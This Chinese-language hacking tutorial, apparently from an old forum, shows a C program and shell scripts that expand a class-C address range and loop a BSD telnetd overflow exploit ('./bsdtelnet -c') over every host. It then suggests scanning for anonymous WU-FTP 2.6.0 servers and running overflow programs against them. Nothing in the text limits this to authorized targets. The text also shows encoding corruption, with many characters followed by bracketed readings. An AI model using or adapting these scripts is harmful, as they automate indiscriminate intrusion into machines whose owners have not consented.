面我們就以一個(gè)簡(jiǎn)單的掃描一個(gè)C類IP里BSDTELNET漏洞機(jī)器為例子來(lái)看看：$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\n",x);}上面這段C我想不用我多說(shuō)了吧,他生成一個(gè)C類網(wǎng)的網(wǎng)絡(luò)號(hào),大家在編譯后可以./num >>num.txt來(lái)得到這個(gè)文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面這段我們來(lái)說(shuō)說(shuō),read ipip是接受鍵盤的信息,用來(lái)給你輸入1.1.1這樣一個(gè)C段地址以便與下面的LISTIP合并成真正的ip,list='cat num.txt'是讀取我們剛才生成的num.txt里1-254的網(wǎng)絡(luò)號(hào),for listip in $list是把剛才list里的num.txt內(nèi)容循環(huán)讀給listip,然后我們用echo $ipip.$listip就可以得到一個(gè)真正的ip了,再通過(guò)echo >>iplist.txt $ipip.$listip把最后得到的IP寫到iplist.txt.通過(guò)以上步驟,我們得到了一個(gè)c類ip,下面我們就來(lái)用我們事先就有的bsdtelnet溢出代碼來(lái)掃描他們了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'讀取剛才我們生成的iplist.txt文本,for listip in $list把list里存放的ip循環(huán)送給listip, 看這個(gè)./bsdtelnet -c $listip,這個(gè)就是調(diào)用我們?cè)诋?dāng)前這個(gè)SHELL所在的目錄執(zhí)行我們的exploit來(lái)對(duì)ip進(jìn)行探測(cè).全部結(jié)束,好了，細(xì)心的朋友可能發(fā)現(xiàn)了，這樣的掃描似乎很慢,呵呵，確實(shí),因?yàn)檫@樣他不管23端口有沒有開，不管對(duì)方機(jī)器是不是BSD的,他都要去溢出試試,在這里,我只是通過(guò)TOMYCHEN兄提供給大家一個(gè)巧妙利用SHELL的思路,具體大家可以自己發(fā)揮,比如先在SHELL里調(diào)用掃描器掃描,然后把開放有21端口的機(jī)器保存下面,然后再對(duì)開了21端口的機(jī)器進(jìn)行驗(yàn)證看是否可匿名,得到會(huì)話返回消息,如果是WU-FTP260等,就可以再調(diào)用溢出程序進(jìn)行測(cè)試呀等等.還是那句老話,技術(shù)最重要!----------------------------------------------- 作者：SysHunter

最新評(píng)論